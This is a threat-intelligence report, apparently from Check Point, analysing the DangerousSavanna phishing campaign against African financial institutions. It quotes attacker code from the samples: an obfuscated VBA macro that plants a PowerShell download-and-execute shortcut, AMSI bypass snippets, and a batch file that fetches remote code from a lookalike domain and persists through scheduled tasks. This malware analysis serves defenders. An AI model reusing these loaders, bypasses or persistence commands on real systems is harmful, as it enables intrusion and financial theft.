{
	"id": "680e9d95-b5c9-4d5e-94a5-954be84977a7",
	"created_at": "2026-04-16T02:21:58.874603Z",
	"updated_at": "2026-04-18T02:20:57.58346Z",
	"deleted_at": null,
	"sha1_hash": "5f969656b2cf534dc73f76d861e789b18efead0e",
	"title": "DangerousSavanna: Two-year long campaign targets financial institutions in French-speaking Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 145672,
	"plain_text": "DangerousSavanna: Two-year long campaign targets financial\r\ninstitutions in French-speaking Africa\r\nBy etal\r\nPublished: 2022-09-06 · Archived: 2026-04-16 02:07:00 UTC\r\nIntroduction\r\nRecent studies show that more than 85% of financial institutions in Central and Western Africa have repeatedly been\r\nvictimized in multiple, damaging cyberattacks. In a quarter of these cases, intrusions into network systems resulted in the\r\nworst possible outcomes for the financial and banking sector: information leaks, identity theft, money transfer fraud, and\r\nbank withdrawals on false checks.\r\nIn this article, we analyze a malicious campaign called DangerousSavanna which has been targeting multiple major financial\r\nservice groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as\r\na means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least\r\nfive different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. In the last few months, the\r\ncampaign heavily focused on Ivory Coast. Judging by the victimology and tactics, techniques, and procedures (TTPs), we\r\ncan assess with medium to high confidence that the motivation behind DangerousSavanna is likely financial.\r\nDangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are\r\nboth self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat\r\nactors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted\r\ncompanies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written\r\nexecutable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations. The evolving\r\ninfection chains by the threat actor reflect the changes in the threat landscape we’ve seen over the past few years as infection\r\nvectors became more and more sophisticated and diverse.\r\nThis publication provides an overview of the threat actors’ TTPs, the evolution of the infection chains and lures, and the\r\ninfrastructure changes. We also discuss the post-infection activities conducted by the group after they gain initial access to\r\nthe targets’ internal networks.\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 1 of 17\n\nFigure 1 – Locations of targeted financial services employees, all in French-speaking African countries.\r\nInfection Chains\r\nThe infection starts with spear-phishing emails written in French, usually sent to several employees of the targeted\r\ncompanies, all of which are medium to large financial groups in French-speaking Africa. In the early stages of the campaign,\r\nthe phishing emails were sent using Gmail and Hotmail services. To increase their credibility, the actors began to use\r\nlookalike domains, impersonating other financial institutions in Africa such as the Tunisian Foreign bank, Nedbank, and\r\nothers. For the last year, the actors also used spoofed email addresses of a local insurance advisory company whose domain\r\ndoesn’t have an SPF record.\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 2 of 17\n\nFigure 2 – An example of a phishing email in which the actors used the name of an existing employee at the impersonated\r\ncompany.\r\nThe type of phishing email attachments, and the subsequent infection chains, have also changed over the campaign time\r\nframe, from self-written executable loaders masquerading as PDFs in 2020 to a wide range of file types in 2022.\r\nDangerousSavanna quickly joined the trend of malicious actors shifting from “classic” macro-enabled documents to\r\nexperiment with other file types following Microsoft’s decision to block macros obtained from the internet by default.\r\nFigure 3 – Overview of the changes in the DangerousSavanna infection chains, infrastructure and payloads.\r\nMalicious Documents\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 3 of 17\n\nSince 2021, the actors have been attaching malicious documents to their phishing emails. These documents are either Word\r\ndocuments with macros, documents with a remote template (or, in some cases a few layers of external templates), or PDF\r\ndocuments, which lure the victim to download and then manually execute the next stage. All these documents, both MS\r\nOffice or PDF, are written in the French language and share similar metadata such as the usernames digger , hooper\r\ndavis , and HooperDEV .\r\nFigure 4 – Overview of the lure documents used in the campaign.\r\nThe basic flow utilizes Word documents with macros, which drop an LNK file in the Startup folder. When the LNK file is\r\nexecuted, it downloads from the server and executes PowerShell commands, which perform AMSI bypass and eventually\r\ninstall the PoshC2 implant.\r\nFigure 5 – Phishing document with macro – infection flow.\r\nThe macros contain a lot of unused code to complicate its analysis. The code for the main functionality is trivial, containing\r\nonly reverse string obfuscation and caret obfuscation to create the LNK file used to retrieve the PoshC2 implant:\r\nPlain text\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 4 of 17\n\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nPrivate Function guttural(ludicrous As String)\r\nguttural = StrReverse(ludicrous)\r\nEnd Function\r\nSub automatic()\r\nSet tearful = grandiose(guttural(\"llehS.tpircSW\"))\r\nDim greasy\r\ncowardly = tearful.SpecialFolders(guttural(\"putratS\")) \u0026 guttural(\"knl.ogol/\")\r\nSet great = tearful.CreateShortcut(cowardly)\r\ngreat.IconLocation = guttural(\"oci.serutcip\\}9c2278fc2f8d-dda8-9bf4-e6cf-658bed70{\\ksaT\\egatS\r\neciveD\\tfosorciM\\ataDmargorP\\:C\")\r\ngreat.WindowStyle = 7\r\ngreat.TargetPath = guttural(\"ex\" \u0026 \"e.dmc\")\r\ngreat.Arguments =\r\nguttural(\")^)'\"\"d\"\"d/t^t/m\"\"o\"\"c.ez\"\"i\"\"ig.s\"\"s\"\"erp//:p\"\"t\"\"th'(gn\"\"i\"\"rtSdao^lnw\"\"o\"\"d.)tnei^lcb\"\"e\"\"w.t^en tcej^bo-\r\n\"\"w\"\"en((x\"\"e\"\"i c^- i^n^on- ss^a^py^B c^e^xE- ne^ddi^h dn^i^w- po^n- e^xe.l^lehs^re^w^op c/, ex^e.d^mc\")\r\ngreat.WorkingDirectory = \"C:\"\r\ngreat.HotKey = Chr(69 - 4)\r\ngreat.Description = \"OpenDrive\"\r\ngreat.Save\r\nEnd Sub\r\nPrivate Function guttural(ludicrous As String) guttural = StrReverse(ludicrous) End Function Sub automatic() Set tearful =\r\ngrandiose(guttural(\"llehS.tpircSW\")) Dim greasy cowardly = tearful.SpecialFolders(guttural(\"putratS\")) \u0026\r\nguttural(\"knl.ogol/\") Set great = tearful.CreateShortcut(cowardly) great.IconLocation =\r\nguttural(\"oci.serutcip\\}9c2278fc2f8d-dda8-9bf4-e6cf-658bed70{\\ksaT\\egatS eciveD\\tfosorciM\\ataDmargorP\\:C\")\r\ngreat.WindowStyle = 7 great.TargetPath = guttural(\"ex\" \u0026 \"e.dmc\") great.Arguments =\r\nguttural(\")^)'\"\"d\"\"d/t^t/m\"\"o\"\"c.ez\"\"i\"\"ig.s\"\"s\"\"erp//:p\"\"t\"\"th'(gn\"\"i\"\"rtSdao^lnw\"\"o\"\"d.)tnei^lcb\"\"e\"\"w.t^en tcej^bo-\r\n\"\"w\"\"en((x\"\"e\"\"i c^- i^n^on- ss^a^py^B c^e^xE- ne^ddi^h dn^i^w- po^n- e^xe.l^lehs^re^w^op c/, ex^e.d^mc\")\r\ngreat.WorkingDirectory = \"C:\" great.HotKey = Chr(69 - 4) great.Description = \"OpenDrive\" great.Save End Sub\r\nPrivate Function guttural(ludicrous As String)\r\n guttural = StrReverse(ludicrous)\r\nEnd Function\r\nSub automatic()\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 5 of 17\n\nSet tearful = grandiose(guttural(\"llehS.tpircSW\"))\r\n Dim greasy\r\n cowardly = tearful.SpecialFolders(guttural(\"putratS\")) \u0026 guttural(\"knl.ogol/\")\r\n Set great = tearful.CreateShortcut(cowardly)\r\n great.IconLocation = guttural(\"oci.serutcip\\}9c2278fc2f8d-dda8-9bf4-e6cf-658bed70{\\ksaT\\egatS eciveD\\tfoso\r\n great.WindowStyle = 7\r\n great.TargetPath = guttural(\"ex\" \u0026 \"e.dmc\")\r\n great.Arguments = guttural(\")^)'\"\"d\"\"d/t^t/m\"\"o\"\"c.ez\"\"i\"\"ig.s\"\"s\"\"erp//:p\"\"t\"\"th'(gn\"\"i\"\"rtSdao^lnw\"\"o\"\"d\r\n great.WorkingDirectory = \"C:\"\r\n great.HotKey = Chr(69 - 4)\r\n great.Description = \"OpenDrive\"\r\n great.Save\r\nEnd Sub\r\nDuring this campaign, we observed multiple variations of this flow:\r\nIn some cases, the similar macro drops the LNK file to Desktop instead of the Startup folder; the LNK file is usually\r\ncalled IMPORTANT_2022.lnk and needs an action by the user to run. Both Desktop and Startup LNK methods rely on\r\nadditional actions on the infected machine and therefore avoid the automatic execution of suspicious PowerShell in a\r\nsandbox environment.\r\nThe initial attachment might be a DOCX document that downloads an external template executing a similar macro.\r\nIn some cases, we’ve seen a chain of remote templates being retrieved before the final document with the actual\r\nmacro is delivered.\r\nSome early versions of the macro directly run the PoshC2 PowerShell dropper and skip the step with the LNK file.\r\nThe documents containing macros are often delivered in container files, such as ZIP and ISO files.\r\nIn addition, the actors actively use PDF files to lure the user to download and manually execute the next stage. These are\r\nVBE or JAR files that perform very similar actions, directly loading the PoshC2 implant or dropping an LNK file to load\r\nPoshC2.\r\nPoshC2\r\nRecently, the actors have relied mostly on PoshC2 implants to control the infected machines. Typically, after the initial\r\ninfection launches PowerShell to download code from a Pastebin-like service called paste.c-net.org or a dedicated C\u0026C\r\nserver, it replies with a PowerShell PoshC2 implant, usually consisting of three byte-encoded blocks (all standard modules\r\nfrom PoshC2). The first two PowerShell code blocks that are executed contain two very similar AMSI bypass techniques:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$a = [Ref].Assembly.GetTypes();\r\nForEach($b in $a) {\r\nif ($b.Name -like \"*iutils\") { $c = $b }\r\n};\r\n$d = $c.GetFields('NonPublic,Static');\r\nForEach($e in $d) {\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 6 of 17\n\nif ($e.Name -like \"*itFailed\") { $f = $e }\r\n};\r\n$f.SetValue($null,$true)\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$\r\n$a = [Ref].Assembly.GetTypes(); ForEach($b in $a) { if ($b.Name -like \"*iutils\") { $c = $b } }; $d =\r\n$c.GetFields('NonPublic,Static'); ForEach($e in $d) { if ($e.Name -like \"*itFailed\") { $f = $e } }; $f.SetValue($null,$true)\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$\r\n$a = [Ref].Assembly.GetTypes();\r\nForEach($b in $a) {\r\n if ($b.Name -like \"*iutils\") { $c = $b }\r\n};\r\n$d = $c.GetFields('NonPublic,Static');\r\nForEach($e in $d) {\r\n if ($e.Name -like \"*itFailed\") { $f = $e }\r\n};\r\n$f.SetValue($null,$true)\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')\r\nThe third block contains a backdoor which is responsible for communication with the C\u0026C server. It sends requests to the\r\nserver in a loop with a cookie called SessionID with a base64-encoded AES encrypted string that contains information\r\nabout the victim:\r\n\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;1\"\r\nThe script expects the response by the C\u0026C to be a PowerShell script as well since it passes the result to the Invoke-Expression cmdlet.\r\nAsyncRAT\r\nBack in October 2021, we observed a case where a malicious document from the campaign reached out to paste.c-net.org,\r\nbut instead retrieved a PowerShell script that loads an AsyncRAT assembly in memory. However, this AsyncRAT build is\r\ncompletely unobfuscated, and in fact contains a server certificate with the CN “AsyncRAT Server”, showing the attackers\r\ngave little thought to making any changes to the open-source tool.\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 7 of 17\n\nFigure 6 – AsyncRAT Source Code on GitHub vs decompiled AsyncRAT (on the right)\r\nOlder document versions\r\nThe earliest versions of the documents, dated in the first half of 2021, have different macros which are significantly more\r\nobfuscated and contain more than a 1MB of junk code.\r\nFigure 7 – A part of Vba2graph visualization of 1.7MB macros for the May 2021 document\r\n(md5:a09b19b6975e090fb4eda6ced1847b1), with the only functional flow starting from Document_Open.\r\nOne of these documents, called Nouvelles_Dispositions_Sanitaires.doc (New Sanitary Provisions.doc) uses a macro to\r\ndownload a PowerShell script from 4sync.com , cloud storage for syncing files between different devices, and then loads\r\nand executes in memory an assembly from http://3.8.126[.]182/minom.txt . A very similar document, thoroughly\r\ndetailed back in May 2021 in a blog post by InQuest, also used 4sync to install what seemed to be a custom backdoor named\r\nBillang. It’s a .NET executable with this PDB path:\r\nC:\\Users\\wallstreet\\source\\repos\\Billang\\Billang\\obj\\Release\\Billang.pdb . It collects some information about the\r\nmachine it’s running on, sends it to the remote server, and retrieves another .NET executable called liko (or, based on the\r\nPDB path, WindowsFormsApp3). Among other features, this program injects a byte-reversed Meterpreter HTTPS shellcode\r\nto the mspaint.exe process. Another interesting feature of this binary is that the shellcode only launches after detecting a\r\nmouse click, perhaps as an anti-sandbox feature.\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 8 of 17\n\nFigure 8 – Shellcode injection from WindowsFormsApp3.exe (0b1d7c043be8c696d53d63fc0c834195) to mspaint.exe.\r\nSearching for more related files, we found additional executables written in C# that in a similar way launch a process such\r\nas notepad.exe or mspaint.exe and inject the shellcode to them, not embedded but downloaded from a C\u0026C server, into\r\nthe benign process. These simple injector executables vary little in their functionality. The difference between them is the\r\nobfuscation methods: some are packed with SmartAssembly, and some contain obfuscated variable names. However, all of\r\nthe shellcode payloads we observed are Meterpreter shellcode, and of those executables that contain their debug\r\ninformation, all reference the PDB path starting with C:\\Users\\wallstreet\\ .\r\nExecutable droppers\r\nIn the early days of the campaign, from the end of 2020 to the beginning of 2021, the actors relied on small self-written tools\r\nin .NET instead of documents. First-stage executable droppers attached to the phishing emails are disguised as documents\r\nand have a PDF icon and sometimes double extension in the name (for example, Nouvelles Reformes 2021.pdf.exe which in\r\nEnglish is “New Reforms 2021.pdf.exe”). In fact, these trivial downloaders use batch scripts (or cmd commands) and\r\nPowerShell to retrieve the second-stage loaders from file-sharing platforms like 4sync.com or filesend.jp and execute\r\nthem. In this specific example, the dropper creates and runs a bat file which performs AMSI bypass via COM Hijacking and\r\nthen uses PowerShell to download the next stage loader and save it on the disk as WinTray.exe :\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 9 of 17\n\nFigure 9 – Simplified infection chain for “Nouvelles Reformes 2021.pdf.exe” (7b8d0b4e718bc543de4a049e23672d79)\r\nThe second-stage executables’ purpose is to inject the final payload, the Meterpreter shellcode which is usually downloaded\r\nfrom the hard-coded address, to different benign Windows processes. These tools are similar to those discussed by InQuest\r\nand, unless their debugging information was removed, also contain PDB paths with the unique username wallstreet .\r\nIn late 2021, some of the infection chains started using C# executables to perform even more simple actions, simply\r\nlaunching PowerShell to pull the next stage from a server. At the time, the campaign was already using PoshC2 implants\r\ninstead of Metasploit payloads, but the tools still have PDB paths referring to wallstreet. (Example:\r\nC:\\Users\\wallstreet\\source\\repos\\PDF Document\\PDF Document\\obj\\Release\\PDF Document.pdb ).\r\nPost-Infection Activities\r\nWhen the initial PowerShell backdoor connected to the C\u0026C, the attackers automatically sent AMSI bypass commands and\r\na PoshC2 implant, which then retrieves a second stage implant to add additional functionality in the PowerShell session.\r\nNext, the actors establish persistence and perform reconnaissance, while also running some commands to try and evade\r\ndetection.\r\nEvasion techniques\r\nTo evade detection, the attackers first run two additional AMSI bypass commands, even though the backdoor always starts\r\nwith AMSI bypass. They then inject shellcode into RuntimeBroker.exe and iexpress.exe, built-in Windows binaries, using\r\nthe PoshC2 Inject-Shellcode module. The injected code is Sharpv4 shellcode which contains a DLL that patches\r\nAmsiScanBuffer (AMSI bypass technique) and EtwEventWrite (Event Tracing for Windows bypass technique):\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 10 of 17\n\nFigure 10 – DLL from the attacker shellcode that patches AmsiScanBuffer and EtwEventWrite.\r\nFigure 11 – Event log showing the shellcode injection into RuntimeBroker.exe.\r\nIt then loads the base64-encoded .NET executable containing a base64-encoded PoshC2 PowerShell implant. This chain of\r\nevents eventually allows the actors to re-establish the backdoor in a stealthier manner, running as a known Microsoft\r\nprocess.\r\nPersistence\r\nTo set up persistence, the actors drop a batch file called WinComp.bat to the disk. First, it searches for the process\r\niexpress.exe , the one that runs the injected shellcode. If the process exists, the script terminates. Otherwise, it starts the\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 11 of 17\n\nPowerShell backdoor using an obfuscated command, and connects to a C2 server controlled by the attackers:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n@echo off\r\nSETLOCAL EnableExtensions\r\nset EXE=iexpress.exe\r\nFOR /F %%x IN ('tasklist /NH /FI \"IMAGENAME eq %EXE%\"') DO IF %%x == %EXE% goto ProcessFound\r\ngoto ProcessNotFound\r\n:ProcessFound\r\nExit\r\ngoto END\r\n:ProcessNotFound\r\ncmd cm^d.e^xe ,/c po^w^er^shel^l.ex^e -n^op -w^i^nd h^idd^en -Ex^e^c B^yp^a^ss -no^n^i -^c i\"e\"x((ne\"w\"-ob^ject\r\nne^t.w\"e\"bcl^ient).d\"o\"wnl^oadStr\"i\"ng('ht\"\"t\"\"p://ned\"\"b\"\"ankplc.\"\"4\"\"nmn.c^om/t^t/l\"\"l\"\"')^)\r\ngoto END\r\n:END\r\n@echo off SETLOCAL EnableExtensions set EXE=iexpress.exe FOR /F %%x IN ('tasklist /NH /FI \"IMAGENAME eq\r\n%EXE%\"') DO IF %%x == %EXE% goto ProcessFound goto ProcessNotFound :ProcessFound Exit goto END\r\n:ProcessNotFound cmd cm^d.e^xe ,/c po^w^er^shel^l.ex^e -n^op -w^i^nd h^idd^en -Ex^e^c B^yp^a^ss -no^n^i -^c\r\ni\"e\"x((ne\"w\"-ob^ject ne^t.w\"e\"bcl^ient).d\"o\"wnl^oadStr\"i\"ng('ht\"\"t\"\"p://ned\"\"b\"\"ankplc.\"\"4\"\"nmn.c^om/t^t/l\"\"l\"\"')^) goto\r\nEND :END\r\n@echo off\r\nSETLOCAL EnableExtensions\r\nset EXE=iexpress.exe\r\nFOR /F %%x IN ('tasklist /NH /FI \"IMAGENAME eq %EXE%\"') DO IF %%x == %EXE% goto ProcessFound\r\ngoto ProcessNotFound\r\n:ProcessFound\r\nExit\r\ngoto END\r\n:ProcessNotFound\r\ncmd cm^d.e^xe ,/c po^w^er^shel^l.ex^e -n^op -w^i^nd h^idd^en -Ex^e^c B^yp^a^ss -no^n^i -^c i\"e\"x((ne\"w\"-ob^jec\r\ngoto END\r\n:END\r\nAdditionally, the actors drop another script called slmgr.vbs to the disk which simply executes WinComp.bat . To finish\r\nsetting up persistence, the actors create a scheduled task to run slmgr.vbs every 5 minutes, and two different scheduled\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 12 of 17\n\ntasks to execute WinComp.bat every 6 hours. After installing the scheduled tasks, the actors add a hidden attribute on the\r\nscript files to hide them from the user in the hope of avoiding detection:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 5 /tn WinSys /tr \"C:\\Users\\Public\\slmgr.vbs\"\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinSys /tr \"C:\\Users\\Public\\WinComp.bat\"\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinComp /tr \"C:\\Users\\Public\\WinComp.bat\"\r\nattrib +h WinComp.bat\r\nattrib +h slmgr.vbs\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 5 /tn WinSys /tr \"C:\\Users\\Public\\slmgr.vbs\" schtasks /create /f /sc once\r\n/st 00:00 /du 9999:59 /ri 360 /tn WinSys /tr \"C:\\Users\\Public\\WinComp.bat\" schtasks /create /f /sc once /st 00:00 /du\r\n9999:59 /ri 360 /tn WinComp /tr \"C:\\Users\\Public\\WinComp.bat\" attrib +h WinComp.bat attrib +h slmgr.vbs\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 5 /tn WinSys /tr \"C:\\Users\\Public\\slmgr.vbs\"\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinSys /tr \"C:\\Users\\Public\\WinComp.bat\"\r\nschtasks /create /f /sc once /st 00:00 /du 9999:59 /ri 360 /tn WinComp /tr \"C:\\Users\\Public\\WinComp.bat\"\r\nattrib +h WinComp.bat\r\nattrib +h slmgr.vbs\r\nReconnaissance\r\nOver time, multiple reconnaissance commands are sent to collect additional information about the infected computer and its\r\nnetwork. This includes a command from the stage 2 PoshC2 implant to grab screenshots, simply named Get-Screenshot .\r\nThe attackers also send and execute a script called Get-Ipconfig (which seems to originate from Microsoft’s now-defunct\r\nTechNet Gallery, according to a comment in the script) to collect network information from the Win32_ComputerSystem\r\nWMI class. In addition, the attackers use another open-source script called Get-ComputerInfo , which differs from the built-in cmdlet found in PowerShell. This script collects data from multiple WMI classes, including information about the\r\ncomputer hardware and networking. Another script sent by the attackers is called Invoke-Arpscan , which uses C# to run an\r\nARP scan over all network interfaces found on the machine.\r\nFinally, the attackers attempt to create a memory dump of the svchost.exe process, most likely to extract from it the\r\nexisting RDP credentials.\r\nAdditional tools\r\nAlthough the actors initially rely heavily on PoshC2 modules and extensively use its features, after some time spent on the\r\ninfected machine, the actors start downloading some additional payloads. One payload is a legitimate remote access tool\r\ncalled DWService, which masquerades as an Intel service. The UI-based remote access tool probably gives the attackers\r\nmore freedom in their hands-on keyboard operation, with fewer chances of being caught.\r\nAnother interesting action the attackers perform on the infected machines is installing Windows Subsystem for Linux\r\n(WSL). WSL is often used by threat actors to avoid detection while running some useful tools. In our case, the attackers\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 13 of 17\n\ninstalled in WSL an open-source penetration testing tool called CrackMapExe which they use to run an SMB scan of the\r\nnetwork.\r\nAmong other tools related to this campaign, we found an executable named TITAN.exe , which is an open-source anti-EDR\r\ntool known as Backstab. This tool uses the SysInternals Process Explorer driver to kill protected anti-malware processes.\r\nThe tool was compiled from the path C:\\Users\\wallstreet\\Downloads\\Programs\\Backstab-master\\x64\\Debug\\Backstab.pdb , which tells us our wallstreet attackers probably downloaded it directly from GitHub\r\nand compiled it in Visual Studio’s default debug configuration. Together with TITAN.exe , we found an executable called\r\nPOPULAIRE.exe, internally called LoggerStamp\r\n( C:\\Users\\wallstreet\\source\\repos\\LOggerStamp\\Release\\LOggerStamp.pdb ). It’s a basic keylogger that takes advantage\r\nof the SetWindowsHookExW API to register a callback function on all keystrokes, writing them to a file bluntly named\r\nkeylogger.log in the same directory as the executable. This tool doesn’t have any C\u0026C communication mechanism and\r\nrelies on other existing backdoors to send the collected data to the attackers.\r\nVictimology\r\nDangerousSavanna targets medium or large finance-related enterprises which operate across multiple African countries. The\r\ncompanies that belong to these financial groups provide a wide range of banking products and services, and include not only\r\nbanks but also insurance companies, microfinancing companies, financial holding companies, financial management\r\ncompanies, financial advisory services, etc. Despite the relatively low complexity of their tools, we observed the signs that\r\nmight point out that the attackers managed to infect some of their targets. This was most likely due to the actors’ persistent\r\nattempts at infiltration. If one infection chain didn’t work out, they changed the attachment and the lure and tried targeting\r\nthe same company again and again trying to find an entry point. With social engineering via spear-phishing, all it takes is\r\none incautious click by an unsuspecting user.\r\nInfrastructure\r\nFigure 12 – Overview of the changes in infection chains, infrastructure and payloads.\r\nThe timeline above shows the developments in the campaign infrastructure over time. In the early stages, the actors relied on\r\nthird-party file-sharing services, such as FileSend.jp or 4sync.com. In mid-2021, a large cluster of activity was tied solely to\r\nthe Pastebin-like service paste.c-net.org, which was used to store all kinds of attack stages, from multiple external templates\r\nto the final PowerShell implants. In October 2021, the team behind paste.c-net.org did an impressive cleaning operation and,\r\nlikely, proactively monitored all the potentially malicious content shared using their service. Since then, the campaign uses\r\nseemingly random servers and has tried out different kinds of intermediate servers, including bit.ly and iplogger.org\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 14 of 17\n\nredirects, lookalike domains of local financial-related institutions such as nedbank.za[.]com (masquerading as NED bank)\r\nor paste.inexa-group[.]com (masquerading as fintech solutions provider Inexa), or simply relying on short-lived free\r\nDDNS services like Dynu.\r\nConclusion\r\nIn this article, we analyzed a malicious email campaign targeting financial institutions in West and North Africa. This\r\ncampaign, which has been running for almost two years, often changes its tools and methods, demonstrating the actors’\r\nknowledge of open-source tools and penetration testing software. We expect that this campaign, which shows no signs of\r\nstopping or slowing down, will continue to adjust its operations and methods with an eye to maximizing its financial gain.\r\nSpear phishing prevention is a key component of email security.\r\nCheck Point Threat Emulation blocked this attack on a customer environment.\r\nIn addition, complete endpoint protection is essential in preventing the most imminent threats to the endpoint, and is crucial\r\nto avoid security breaches and data compromise.\r\nIOCs\r\n020ea21556b56229bb9714e721d893df\r\n0789e52f16f5fc4ac2dbebadf53d44ec\r\n0b1d7c043be8c696d53d63fc0c834195\r\n16157cdfd7b0ea98c44df15fb2fcb417\r\n1818f84f7f51be74a408f5e193ba5908\r\n18889d70d5546b861c6fa4ec11126942\r\n192b70891de0d54af6fa46bd35a5fd87\r\n1ccd2ce1e827b598207cc65e16686b7b\r\n1eb29f64f19e07d42d9ad8f6597424b8\r\n1eed3153b1afae1676ebd0db99ac5802\r\n1f4f537e550e4299a945a97c1f8a0441\r\n28165bb98959e7e7d9be67f0d248b31d\r\n2c95e83759487d78070b56e40843c543\r\n2e7c90c45b3cd8db15cd22e0caacfd40\r\n31515f871cb12d538d53e730e5ddd406\r\n3227c8a45ce4ccf8c475a51b331720c1\r\n3c70bc09d1f8033e57323879d50ca3ce\r\n40ec0d84272f1f2394b4a3b74dafbf70\r\n46058baa3ef1bdf553d89439cacf0675\r\n46a0071b7e5ea442580a2f80d2fcef42\r\n47c68680c9a00b117764114668357e23\r\n47cf9fda04b2abef75f1eca9804aaebe\r\n496f2a2f14bda410b5f3dcff40bf56c3\r\n4f52ca22d2d28e1ecdb9fba92e4cdde3\r\n4fb7503dd8b21396bf9643e0dce70fcf\r\n4ffd8ae803d7498e2d5a7a7a3a1268f8\r\n5038e5cd4888adb3661d9958f04a1ec1\r\n505724eac0faf0eb32e4ad25ab5cddfe\r\n518a533d6ff1d86afc0f7d94c0a1be7c\r\n565a87ba8e79f5e081ea937068082afd\r\n57511cb12fb5f505b3330dfec18f3432\r\n65cbaec27b51d54dc0bceeef298719a8\r\n66ac99b3501846a6c18f2671dbf31873\r\n6702f0057c401cf390adc28d201118f8\r\n6b14a4d6212087fe8d88ad012dbc8598\r\n6b781c1082014a0177f42e918adb35de\r\nhttps://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/\r\nPage 15 of 17\n\n6c737910247e3122fe810df6a63581f7\r\n6c7846d955bb5f3842bb7c35fae1569a\r\n725489b29e7afbc045b2814dff5474a6\r\n72ca000f40335d771936d077d4cabefb\r\n75931e00c81274b1c279d23dfdb0bbad\r\n76a8391c77723b06587f648dcbde07e9\r\n775c0666a7a482ce664c72ed9195f120\r\n7a4927e1a2aad1bc8ccef956130df0c0\r\n7b8d0b4e718bc543de4a049e23672d79\r\n7b91f06584afdc4a2aa6edd9d04198b7\r\n853403bd5feea1ecf83e812759e1ccc7\r\n8690ccd36c9d63b63e8d0278f0449e3b\r\n886a8ded2ea2f35ee009088d2c24dd32\r\n889e8b93ec0c16ffac62ced220ed8e30\r\n8f4392f839152c9614699048ee4fea11\r\n953d5a3d8e00bbd2dba08579d95c61dc\r\n98bf46542e3e9daa280ef0b395a7dabd\r\n9a57a80692012878fcb463f41ce6dcfa\r\n9d50143836d41726b6564a524453b868\r\n9d9da1992f63776e135c1c1215ee1741\r\na027a4f65e0b0a83eccb56d9047347bd\r\na5fd946bc7e8b12cdfd207790216b4b1\r\na6d8cc18af5a983b4c1a7f4838780b01\r\naa3f386f10864f46a09610d0e03a26b5\r\naeee6b71690a1df75792fcd3d11b8ede\r\naf8de58e3538fcb40334109bcd571939\r\nb397383ba85fc726b424aac26b42f6ae\r\nb651f7dcfeb3e304f7eb636000a6b935\r\nb895d34958be7565888c15a51e0c73c7\r\nb95ba7fb130f95ccae13c54312a69d36\r\nbac7be7eebb8670ae624a0179a366148\r\nbe82532aa428dc5f30107ccfa08da8c6\r\nc43c50baa3271b375298847bf6a7fc13\r\nc4ee082a4ce704dcb3145e2cfd47ef6f\r\nc7beb386813580a4c4812de3ee1aa429\r\nc8ed3353ae9c8b84ea7a9e81d2828193\r\nc9c001c45b2eecaee9704fb21e731ac7\r\nca09b19b6975e090fb4eda6ced1847b1\r\ncced9e8b1a99b9000f4b958f13b164a5\r\nd32e387d60a18fd90c4854f167b4df4b\r\nd43e6ae895039108cf68a361401